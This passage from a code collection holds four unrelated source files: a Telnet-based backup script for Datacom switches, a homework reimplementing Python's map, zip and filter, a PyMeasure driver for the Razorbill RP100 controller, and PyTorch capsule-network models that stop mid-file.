ronikleyton/script-backup-switch-datacom
0
12749355
<filename>src/backupSwitchDatacom.py from telnetlib import Telnet from exception.exceptions import * from datetime import date import time import os from dotenv import load_dotenv import json load_dotenv() ROOT_DIR = os.path.dirname(os.path.abspath(__file__)) f = open(f'{ROOT_DIR}/equipamentos.json') equipamentos = json.load(f)['equipamentos'] def backupSwitchDatacom(equipamento): IP_SERVER_TFTP = os.environ.get('IP_SERVER_TFTP') data_atual = date.today() data_em_texto ="{}-{}-{}".format(data_atual.day, data_atual.month,data_atual.year) r = '\r' r = r.encode('ascii') try: equipamento.connection = Telnet(equipamento.ip, equipamento.port) # Realizando Login index, match_obj, text = equipamento.connection.expect(["login: ".encode('latin-1')], timeout=2) if not match_obj: raise CommandError(f"Falha na conexão, OLT RESPONSE: {text}") equipamento.connection.write(f"{equipamento.user}\r".encode('latin-1')) index, match_obj, text = equipamento.connection.expect(["Password:".encode('latin-1')], timeout=2) if not match_obj: raise CommandError(f"Falha no usuário, OLT RESPONSE: {text}") equipamento.connection.write(f"{equipamento.password}\r".encode('latin-1')) index, match_obj, text = equipamento.connection.expect(["#".encode('latin-1')], timeout=2) if not match_obj: raise CommandError("Falha ao informar a senha") nomeDoArquivo = f"{equipamento.hostname}-{data_em_texto}-config.txt" tftp = f"show running-config | save overwrite {nomeDoArquivo}" tftp = tftp.encode('ascii') equipamento.connection.write(tftp + r) time.sleep(50) index, match_obj, text = equipamento.connection.expect(["#".encode('latin-1')], timeout=2) if not match_obj: raise CommandError("Falha ao executar comando de conectar no tftp ") comando = f"copy file {nomeDoArquivo} tftp://{IP_SERVER_TFTP}/{equipamento.hostname}" comando = comando.encode('ascii') equipamento.connection.write(comando + r) time.sleep(5) index, match_obj, text = equipamento.connection.expect(["#".encode('latin-1')], timeout=2) if not match_obj: raise CommandError("Falha ao enviar arquivo ao servidor FTP") comando = f"file delete {nomeDoArquivo}" comando = comando.encode('ascii') equipamento.connection.write(comando + r) index, match_obj, text = equipamento.connection.expect(["#".encode('latin-1')], timeout=2) print('BackupFinalizado') equipamento.connection.close() except: equipamento.connection.close() raise ConnectionError() class Equipamento: def __init__(self,hostname, ip,port, user, password): self.connection = None self.hostname = hostname self.ip = ip self.port = port self.user = user self.password = password for switch in equipamentos: try: PORT_TELNET = os.environ.get('PORT_TELNET') USER = os.environ.get('USER') PASS = os.environ.get('PASS') print(f"Iniciando Backup no Switch {switch['hostname']}") equipamento = Equipamento(switch['hostname'],switch['ip'],PORT_TELNET,USER,PASS) backupSwitchDatacom(equipamento) except Exception as error: print(error) pass
1.4375
1
P25034-zhaojie/week-11/homework.py
xiaohh2016/python-25
0
12749483
<reponame>xiaohh2016/python-25 #!/usr/bin/env python # encoding:utf-8 # file: homework.py # 自己实现python自带的map、zip和filter函数 # 还没学到 yield语法不熟 先简单实现 # 实现map函数 def my_map(*args): """文档字符串位置 """ if len(args) < 2: # 先不用异常的方式处理 只是打印 print('map()至少需要两个参数') else: # 判断是否为可迭代对象 先不处理 fnc_nme = args[0] new_tpl = args[1:] min_len = len(min(new_tpl, key=len)) for idx in range(min_len): # yield后的代码会继续执行 yield只要存在函数就变成生成器 yield fnc_nme(*[itr[idx] for itr in new_tpl]) # 实现zip函数 def my_zip(*args): if not len(args): return tuple() min_len = len(min(args, key=len)) for idx in range(min_len): yield tuple(itr[idx] for itr in args) # 实现filter函数 def my_filter(func, itr): if func is not None: for it in itr: if func(it): yield it else: for it in itr: if it: yield it # 测试函数 加法 def func1(x, y): return x + y # 测试函数 平方 def func2(x): return x ** 2 # 测试函数 取大于100的数 def func3(x): return True if x > 100 else False if __name__ == '__main__': l1 = [3, 2, 3] l2 = [6, 5] print(list(my_map(func1, l1, l2))) print(list(my_zip([1, 2, 3], [4, 5], 'abcdefg'))) print(list(my_filter(func3, [0, 201, 1, 2, 3, 100, 101]))) print(list(my_zip())) print(list(my_filter(None, [0, 201, 1, 2, 3, 100, 101]))) print('-------- 对照组 --------') print(list(map(func1, l1, l2))) print(list(zip([1, 2, 3], [4, 5], 'abcdefg'))) print(list(filter(func3, [0, 201, 1, 2, 3, 100, 101]))) print(list(zip())) print(list(filter(None, [0, 201, 1, 2, 3, 100, 101])))
2.6875
3
pymeasure/instruments/razorbill/razorbillRP100.py
KOLANICH-physics/pymeasure
2
12749611
<reponame>KOLANICH-physics/pymeasure<filename>pymeasure/instruments/razorbill/razorbillRP100.py # # This file is part of the PyMeasure package. # # Copyright (c) 2013-2019 PyMeasure Developers # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # from pymeasure.instruments import Instrument from pymeasure.instruments.validators import (strict_discrete_set, strict_range) class razorbillRP100(Instrument): """Represents Razorbill RP100 strain cell controller .. code-block:: python scontrol = razorbillRP100("ASRL/dev/ttyACM0::INSTR") scontrol.output_1 = True # turns output on scontrol.slew_rate_1 = 1 # sets slew rate to 1V/s scontrol.voltage_1 = 10 # sets voltage on output 1 to 10V """ output_1 = Instrument.control("OUTP1?", "OUTP1 %d", """Turns output of channel 1 on or off""", validator=strict_discrete_set, values={True: 1, False: 0}, map_values=True) output_2 = Instrument.control("OUTP2?", "OUTP2 %d", """Turns output of channel 2 on or off""", validator=strict_discrete_set, values={True: 1, False: 0}, map_values=True) voltage_1 = Instrument.control("SOUR1:VOLT?", "SOUR1:VOLT %g", """Sets or queries the output voltage of channel 1""", validator=strict_range, values=[-230, 230]) voltage_2 = Instrument.control("SOUR2:VOLT?", "SOUR2:VOLT %g", """Sets or queries the output voltage of channel 2""", validator=strict_range, values=[-230, 230]) slew_rate_1 = Instrument.control("SOUR1:VOLT:SLEW?", "SOUR1:VOLT:SLEW %g", """Sets or queries the source slew rate in volts/sec of channel 1""", validator=strict_range, values=[0.1*10e-3, 100*10e3]) slew_rate_2 = Instrument.control("SOUR2:VOLT:SLEW?", "SOUR2:VOLT:SLEW %g", """Sets or queries the source slew rate in volts/sec of channel 2""", validator=strict_range, values=[0.1*10e-3, 100*10e3]) instant_voltage_1 = Instrument.measurement("SOUR1:VOLT:NOW?", """Returns the instantaneous output of source one in volts""") instant_voltage_2 = Instrument.measurement("SOUR2:VOLT:NOW?", """Returns the instanteneous output of source two in volts""") contact_voltage_1 = Instrument.measurement("MEAS1:VOLT?", """Returns the Voltage in volts present at the front panel output of channel 1""") contact_voltage_2 = Instrument.measurement("MEAS2:VOLT?", """Returns the Voltage in volts present at the front panel output of channel 2""") contact_current_1 = Instrument.measurement("MEAS1:CURR?", """Returns the current in amps present at the front panel output of channel 1""") contact_current_2 = Instrument.measurement("MEAS2:CURR?", """Returns the current in amps present at the front panel output of channel 2""") def __init__(self, adapter, **kwargs): super(razorbillRP100, self).__init__( adapter, "Razorbill RP100 Piezo Stack Powersupply", **kwargs ) self.timeout = 20
1.429688
1
src/capsule_model.py
Sharut/Bilinear-Linformer
0
12749739
<reponame>Sharut/Bilinear-Linformer<filename>src/capsule_model.py<gh_stars>0 # # For licensing see accompanying LICENSE file. # Copyright (C) 2019 Apple Inc. All Rights Reserved. # from src import layers import torch.nn as nn import torch.nn.functional as F import torch ''' {'backbone': {'kernel_size': 3, 'output_dim': 128, 'input_dim': 3, 'stride': 2, 'padding': 1, 'out_img_size': 16}, 'primary_capsules': {'kernel_size': 1, 'stride': 1, 'input_dim': 128, 'caps_dim': 16, 'nu m_caps': 32, 'padding': 0, 'out_img_size': 16}, 'capsules': [{'type': 'CONV', 'num_caps': 32, 'caps_dim': 16, 'kernel_size': 3, 'stride': 2, 'matrix_pose': True, 'out_img_size': 7}, {'type': 'CONV', 'num_ caps': 32, 'caps_dim': 16, 'kernel_size': 3, 'stride': 1, 'matrix_pose': True, 'out_img_size': 5}], 'class_capsules': {'num_caps': 10, 'caps_dim': 16, 'matrix_pose': True}} {'kernel_size': 1, 'stride': 1, 'input_dim': 128, 'caps_dim': 16, 'num_caps': 32, 'padding': 0, 'out_img_size': 16} ''' # Capsule model with bilinear routing and random projections class CapsBilinearLinformerUnfoldModel(nn.Module): def __init__(self, image_dim_size, params, dataset, backbone, dp, num_routing, sequential_routing=True): super(CapsBilinearLinformerUnfoldModel, self).__init__() #### Parameters self.sequential_routing = sequential_routing ## Primary Capsule Layer self.pc_num_caps = params['primary_capsules']['num_caps'] self.pc_caps_dim = params['primary_capsules']['caps_dim'] self.pc_output_dim = params['primary_capsules']['out_img_size'] ## General self.num_routing = num_routing # >3 may cause slow converging #### Building Networks ## Backbone (before capsule) if backbone == 'simple': self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['kernel_size'], params['backbone']['stride'], params['backbone']['padding']) elif backbone == 'resnet': # Ouputs 16 X 16 X 128 dim if dataset == 'CIFAR10' or dataset == 'CIFAR100': print("Using CIFAR backbone") self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) else: print("Using New ResNet Backbone") self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) ## Primary Capsule Layer (a single CNN) self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'], out_channels=params['primary_capsules']['num_caps'] *\ params['primary_capsules']['caps_dim'], kernel_size=params['primary_capsules']['kernel_size'], stride=params['primary_capsules']['stride'], padding=params['primary_capsules']['padding'], bias=False) #self.pc_layer = nn.Sequential() self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim']) ## Main Capsule Layers self.capsule_layers = nn.ModuleList([]) for i in range(len(params['capsules'])): if params['capsules'][i]['type'] == 'CONV': in_n_caps = params['primary_capsules']['num_caps'] if i==0 else \ params['capsules'][i-1]['num_caps'] in_d_caps = params['primary_capsules']['caps_dim'] if i==0 else \ params['capsules'][i-1]['caps_dim'] output_img_size = params['capsules'][i]['out_img_size'] input_img_size = params['primary_capsules']['out_img_size'] if i==0 else \ params['capsules'][i-1]['out_img_size'] self.capsule_layers.append( layers.LACapsuleCONV(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], kernel_size=params['capsules'][i]['kernel_size'], stride=params['capsules'][i]['stride'], input_img_size = input_img_size, output_img_size = output_img_size, hidden_dim= params['capsules'][i]['hidden_dim'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp, coordinate_add=False, padding=params['capsules'][i].get('padding', None) ) ) elif params['capsules'][i]['type'] == 'FC': output_img_size = 1 if i == 0: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] input_img_size = params['primary_capsules']['out_img_size'] elif params['capsules'][i-1]['type'] == 'FC': in_n_caps = params['capsules'][i-1]['num_caps'] in_d_caps = params['capsules'][i-1]['caps_dim'] input_img_size = 1 elif params['capsules'][i-1]['type'] == 'CONV': in_n_caps = params['capsules'][i-1]['num_caps'] * params['capsules'][i-1]['out_img_size'] *\ params['capsules'][i-1]['out_img_size'] in_d_caps = params['capsules'][i-1]['caps_dim'] input_img_size = params['capsules'][i-1]['out_img_size'] self.capsule_layers.append( layers.LACapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], input_img_size = input_img_size, output_img_size = output_img_size, hidden_dim= params['capsules'][i]['hidden_dim'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp ) ) ## Class Capsule Layer if not len(params['capsules'])==0: output_img_size = 1 if params['capsules'][-1]['type'] == 'FC': in_n_caps = params['capsules'][-1]['num_caps'] in_d_caps = params['capsules'][-1]['caps_dim'] input_img_size = 1 elif params['capsules'][-1]['type'] == 'CONV': in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] *\ params['capsules'][-1]['out_img_size'] in_d_caps = params['capsules'][-1]['caps_dim'] input_img_size = params['capsules'][-1]['out_img_size'] else: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] input_img_size = params['primary_capsules']['out_img_size'] self.capsule_layers.append( layers.LACapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['class_capsules']['num_caps'], out_d_capsules=params['class_capsules']['caps_dim'], input_img_size = input_img_size, output_img_size = output_img_size, hidden_dim= params['capsules'][i]['hidden_dim'], matrix_pose=params['class_capsules']['matrix_pose'], dp=dp ) ) ## After Capsule # fixed classifier for all class capsules self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1) # different classifier for different capsules #self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim'])) def forward(self, x, lbl_1=None, lbl_2=None): #### Forward Pass ## Backbone (before capsule) c = self.pre_caps(x) # print(c.shape) # print("Backbone: ", c.shape) ## Primary Capsule Layer (a single CNN) u = self.pc_layer(c) # torch.Size([100, 512, 14, 14]) u = u.permute(0, 2, 3, 1) # 100, 14, 14, 512 # print("Shape:", u.shape) u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim) # 100, 14, 14, 32, 16 u = u.permute(0, 3, 1, 2, 4) # 100, 32, 14, 14, 16 init_capsule_value = self.nonlinear_act(u)#capsule_utils.squash(u) ## Main Capsule Layers # concurrent routing if not self.sequential_routing: # first iteration # perform initilialization for the capsule values as single forward passing capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): _val = self.capsule_layers[i].forward(_val, 0) capsule_values.append(_val) # get the capsule value for next layer # second to t iterations # perform the routing between capsule layers for n in range(self.num_routing-1): _capsule_values = [init_capsule_value] for i in range(len(self.capsule_layers)): _val = self.capsule_layers[i].forward(capsule_values[i], n, capsule_values[i+1]) _capsule_values.append(_val) capsule_values = _capsule_values # sequential routing else: capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): # first iteration __val = self.capsule_layers[i].forward(_val, 0) # second to t iterations # perform the routing between capsule layers for n in range(self.num_routing-1): __val = self.capsule_layers[i].forward(_val, n, __val) _val = __val capsule_values.append(_val) ## After Capsule out = capsule_values[-1] # print("out shape, ", out.shape) out = self.final_fc(out) # fixed classifier for all capsules # print("classifier shape, ", out.shape) out = out.squeeze(1) # fixed classifier for all capsules out = out.squeeze(2) out = out.squeeze(1) #out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules # print("Final shape, ", out.shape) return out # Capsule model class CapsModel(nn.Module): def __init__(self, image_dim_size, params, dataset, backbone, dp, num_routing, sequential_routing=True): super(CapsModel, self).__init__() #### Parameters self.sequential_routing = sequential_routing ## Primary Capsule Layer self.pc_num_caps = params['primary_capsules']['num_caps'] self.pc_caps_dim = params['primary_capsules']['caps_dim'] self.pc_output_dim = params['primary_capsules']['out_img_size'] ## General self.num_routing = num_routing # >3 may cause slow converging #### Building Networks ## Backbone (before capsule) if backbone == 'simple': self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['kernel_size'], params['backbone']['stride'], params['backbone']['padding']) elif backbone == 'resnet': # Ouputs 16 X 16 X 128 dim if dataset == 'CIFAR10' or dataset == 'CIFAR100' or "NIST" in dataset: print("Using standard ResNet Backbone") self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) else: print("Using New ResNet Backbone") self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) ## Primary Capsule Layer (a single CNN) # {'kernel_size': 1, 'stride': 1, 'input_dim': 128, 'caps_dim': 16, 'num_caps': 32, 'padding': 0, 'out_img_size': 16} print(params['primary_capsules']) self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'], out_channels=params['primary_capsules']['num_caps'] *\ params['primary_capsules']['caps_dim'], kernel_size=params['primary_capsules']['kernel_size'], stride=params['primary_capsules']['stride'], padding=params['primary_capsules']['padding'], bias=False) #self.pc_layer = nn.Sequential() self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim']) ## Main Capsule Layers self.capsule_layers = nn.ModuleList([]) for i in range(len(params['capsules'])): if params['capsules'][i]['type'] == 'CONV': in_n_caps = params['primary_capsules']['num_caps'] if i==0 else \ params['capsules'][i-1]['num_caps'] in_d_caps = params['primary_capsules']['caps_dim'] if i==0 else \ params['capsules'][i-1]['caps_dim'] # num_in_capsules=32, in_cap_d=16, out_Cap=32, out_dim_cap=16 # 3x3 kernel, stride 2 and output shape: 7x7 self.capsule_layers.append( layers.CapsuleCONV(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], kernel_size=params['capsules'][i]['kernel_size'], stride=params['capsules'][i]['stride'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp, coordinate_add=False ) ) elif params['capsules'][i]['type'] == 'FC': if i == 0: # When there is no Conv layer after primary capsules in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] elif params['capsules'][i-1]['type'] == 'FC': in_n_caps = params['capsules'][i-1]['num_caps'] in_d_caps = params['capsules'][i-1]['caps_dim'] elif params['capsules'][i-1]['type'] == 'CONV': # There are a total of 14X14X32 capsule outputs, each being 16 dimensional in_n_caps = params['capsules'][i-1]['num_caps'] * params['capsules'][i-1]['out_img_size'] *\ params['capsules'][i-1]['out_img_size'] in_d_caps = params['capsules'][i-1]['caps_dim'] self.capsule_layers.append( layers.CapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp ) ) ## Class Capsule Layer if not len(params['capsules'])==0: if params['capsules'][-1]['type'] == 'FC': in_n_caps = params['capsules'][-1]['num_caps'] in_d_caps = params['capsules'][-1]['caps_dim'] elif params['capsules'][-1]['type'] == 'CONV': in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] *\ params['capsules'][-1]['out_img_size'] in_d_caps = params['capsules'][-1]['caps_dim'] else: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] self.capsule_layers.append( layers.CapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['class_capsules']['num_caps'], out_d_capsules=params['class_capsules']['caps_dim'], matrix_pose=params['class_capsules']['matrix_pose'], dp=dp ) ) ## After Capsule # fixed classifier for all class capsules self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1) # different classifier for different capsules #self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim'])) def forward(self, x, lbl_1=None, lbl_2=None): #### Forward Pass ## Backbone (before capsule) # Converts Input (b, 3, 14, 14)--> (b, 128, 14, 14) c = self.pre_caps(x) ## Primary Capsule Layer (a single CNN) (Ouput size: b, 512, 14, 14) (32 caps, 16 dim each) u = self.pc_layer(c) u = u.permute(0, 2, 3, 1) # b, 14, 14, 512 u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim) # b, 14, 14, 32, 16 u = u.permute(0, 3, 1, 2, 4) # b, 32, 14, 14, 16 # Layer norm init_capsule_value = self.nonlinear_act(u) #capsule_utils.squash(u) ## Main Capsule Layers # concurrent routing if not self.sequential_routing: # first iteration # perform initilialization for the capsule values as single forward passing capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): _val = self.capsule_layers[i].forward(_val, 0) capsule_values.append(_val) # get the capsule value for next layer # second to t iterations # perform the routing between capsule layers for n in range(self.num_routing-1): _capsule_values = [init_capsule_value] for i in range(len(self.capsule_layers)): _val = self.capsule_layers[i].forward(capsule_values[i], n, capsule_values[i+1]) _capsule_values.append(_val) capsule_values = _capsule_values # sequential routing else: capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): # first iteration __val = self.capsule_layers[i].forward(_val, 0) # second to t iterations # perform the routing between the 2 capsule layers for some iterations # till you move to next pair of layers for n in range(self.num_routing-1): __val = self.capsule_layers[i].forward(_val, n, __val) _val = __val capsule_values.append(_val) ## After Capsule # Output capsule (last layer) out = capsule_values[-1] out = self.final_fc(out) # fixed classifier for all capsules out = out.squeeze() # fixed classifier for all capsules #out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules return out # Capsule model with bilinear sparse routing class CapsSAModel(nn.Module): def __init__(self, image_dim_size, params, dataset, backbone, dp, num_routing, sequential_routing=True): super(CapsSAModel, self).__init__() #### Parameters self.sequential_routing = sequential_routing ## Primary Capsule Layer self.pc_num_caps = params['primary_capsules']['num_caps'] self.pc_caps_dim = params['primary_capsules']['caps_dim'] self.pc_output_dim = params['primary_capsules']['out_img_size'] ## General self.num_routing = num_routing # >3 may cause slow converging #### Building Networks ## Backbone (before capsule) if backbone == 'simple': self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['kernel_size'], params['backbone']['stride'], params['backbone']['padding']) elif backbone == 'resnet': # Ouputs 16 X 16 X 128 dim if dataset == 'CIFAR10' or dataset == 'CIFAR100'or "NIST" in dataset: print("Using CIFAR backbone") self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) else: print("Using New ResNet Backbone") self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) ## Primary Capsule Layer (a single CNN) self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'], out_channels=params['primary_capsules']['num_caps'] *\ params['primary_capsules']['caps_dim'], kernel_size=params['primary_capsules']['kernel_size'], stride=params['primary_capsules']['stride'], padding=params['primary_capsules']['padding'], bias=False) #self.pc_layer = nn.Sequential() self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim']) ## Main Capsule Layers self.capsule_layers = nn.ModuleList([]) for i in range(len(params['capsules'])): if params['capsules'][i]['type'] == 'CONV': in_n_caps = params['primary_capsules']['num_caps'] if i==0 else \ params['capsules'][i-1]['num_caps'] in_d_caps = params['primary_capsules']['caps_dim'] if i==0 else \ params['capsules'][i-1]['caps_dim'] self.capsule_layers.append( layers.SACapsuleCONV(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], kernel_size=params['capsules'][i]['kernel_size'], stride=params['capsules'][i]['stride'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp, coordinate_add=False, padding=params['capsules'][i].get('padding', None) ) ) elif params['capsules'][i]['type'] == 'FC': if i == 0: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] elif params['capsules'][i-1]['type'] == 'FC': in_n_caps = params['capsules'][i-1]['num_caps'] in_d_caps = params['capsules'][i-1]['caps_dim'] elif params['capsules'][i-1]['type'] == 'CONV': in_n_caps = params['capsules'][i-1]['num_caps'] * params['capsules'][i-1]['out_img_size'] *\ params['capsules'][i-1]['out_img_size'] in_d_caps = params['capsules'][i-1]['caps_dim'] self.capsule_layers.append( layers.SACapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp ) ) ## Class Capsule Layer if not len(params['capsules'])==0: if params['capsules'][-1]['type'] == 'FC': in_n_caps = params['capsules'][-1]['num_caps'] in_d_caps = params['capsules'][-1]['caps_dim'] elif params['capsules'][-1]['type'] == 'CONV': in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] *\ params['capsules'][-1]['out_img_size'] in_d_caps = params['capsules'][-1]['caps_dim'] else: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] self.capsule_layers.append( layers.SACapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['class_capsules']['num_caps'], out_d_capsules=params['class_capsules']['caps_dim'], matrix_pose=params['class_capsules']['matrix_pose'], dp=dp ) ) ## After Capsule # fixed classifier for all class capsules self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1) # different classifier for different capsules #self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim'])) def forward(self, x, lbl_1=None, lbl_2=None): #### Forward Pass ## Backbone (before capsule) c = self.pre_caps(x) # print(c.shape) # print("Backbone: ", c.shape) ## Primary Capsule Layer (a single CNN) u = self.pc_layer(c) # torch.Size([100, 512, 14, 14]) u = u.permute(0, 2, 3, 1) # 100, 14, 14, 512 # print("Shape:", u.shape) u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim) # 100, 14, 14, 32, 16 u = u.permute(0, 3, 1, 2, 4) # 100, 32, 14, 14, 16 init_capsule_value = self.nonlinear_act(u)#capsule_utils.squash(u) ## Main Capsule Layers # concurrent routing if not self.sequential_routing: # first iteration # perform initilialization for the capsule values as single forward passing capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): _val = self.capsule_layers[i].forward(_val, 0) capsule_values.append(_val) # get the capsule value for next layer # second to t iterations # perform the routing between capsule layers for n in range(self.num_routing-1): _capsule_values = [init_capsule_value] for i in range(len(self.capsule_layers)): _val = self.capsule_layers[i].forward(capsule_values[i], n, capsule_values[i+1]) _capsule_values.append(_val) capsule_values = _capsule_values # sequential routing else: capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): # first iteration __val = self.capsule_layers[i].forward(_val, 0) # second to t iterations # perform the routing between capsule layers for n in range(self.num_routing-1): __val = self.capsule_layers[i].forward(_val, n, __val) _val = __val capsule_values.append(_val) ## After Capsule out = capsule_values[-1] # print("out shape, ", out.shape) out = self.final_fc(out) # fixed classifier for all capsules # print("classifier shape, ", out.shape) out = out.squeeze(1) # fixed classifier for all capsules out = out.squeeze(2) out = out.squeeze(1) #out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules # print("Final shape, ", out.shape) return out # Capsule model with bilinear routing without sinkhorn class CapsBAModel(nn.Module): def __init__(self, image_dim_size, params, dataset, backbone, dp, num_routing, sequential_routing=True): super(CapsBAModel, self).__init__() #### Parameters self.sequential_routing = sequential_routing ## Primary Capsule Layer self.pc_num_caps = params['primary_capsules']['num_caps'] self.pc_caps_dim = params['primary_capsules']['caps_dim'] self.pc_output_dim = params['primary_capsules']['out_img_size'] ## General self.num_routing = num_routing # >3 may cause slow converging #### Building Networks ## Backbone (before capsule) if backbone == 'simple': self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['kernel_size'], params['backbone']['stride'], params['backbone']['padding']) elif backbone == 'resnet': # Ouputs 16 X 16 X 128 dim if dataset == 'CIFAR10' or dataset == 'CIFAR100'or "NIST" in dataset: print("Using CIFAR backbone") self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) else: print("Using New ResNet Backbone") self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) ## Primary Capsule Layer (a single CNN) self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'], out_channels=params['primary_capsules']['num_caps'] *\ params['primary_capsules']['caps_dim'], kernel_size=params['primary_capsules']['kernel_size'], stride=params['primary_capsules']['stride'], padding=params['primary_capsules']['padding'], bias=False) #self.pc_layer = nn.Sequential() self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim']) ## Main Capsule Layers self.capsule_layers = nn.ModuleList([]) for i in range(len(params['capsules'])): if params['capsules'][i]['type'] == 'CONV': in_n_caps = params['primary_capsules']['num_caps'] if i==0 else \ params['capsules'][i-1]['num_caps'] in_d_caps = params['primary_capsules']['caps_dim'] if i==0 else \ params['capsules'][i-1]['caps_dim'] self.capsule_layers.append( 